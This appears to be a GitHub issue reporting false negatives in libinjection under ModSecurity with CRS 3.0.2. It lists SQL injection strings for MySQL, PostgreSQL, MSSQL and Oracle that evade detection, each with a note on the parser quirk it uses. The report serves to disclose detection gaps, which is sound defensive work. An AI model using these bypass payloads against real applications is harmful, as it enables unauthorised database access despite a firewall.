Multiple False Negatives #139

Open
samngms opened this issue May 22, 2018 · 0 comments

samngms commented May 22, 2018

Tested with ModSecurity for IIS 2.9.2, CRS 3.0.2

I don't know which version of libInjection they are using.

// MySQL 5.7
// I also don't know what it means, but it works on MySQL, basically, .1e(2) = 2
a' or 3>.1e(2) #

// PgSQL 9.6
// |/ is sq root, ||/ is cubic root, works for both
0 or |/ 25 > 1
a' or $foobar$a'b$foobar$ != 'y

// MSSQL 2016 Express
// note there is a space b/w < and >, I forgot whether it works for != or not
10 or 2 < > 1 
// the following works with many other currency symbols
// and works with or without a space b/w "or" and the currency symbol 
a' or€2 > 0 -- 

// Oracle XE (11g)
// ^= means !=, but weirdly enough, libInjection detects ¬=
0 or 2^=1 
// note the first ( is a full width open parenthesis
// libInjection converts full width open parenthesis to half width open parenthesis
// and therefore wrongly closes the q quote after a, but in fact, the correct string should be [a') b d e]
x' or q'(a)' b d e(' != 'x 
// in Oracle 1d means 1 (decimal), and if the 'd' exists, Oracle always takes it
// same for 1f (floating point)
x' + 1dor 2>'1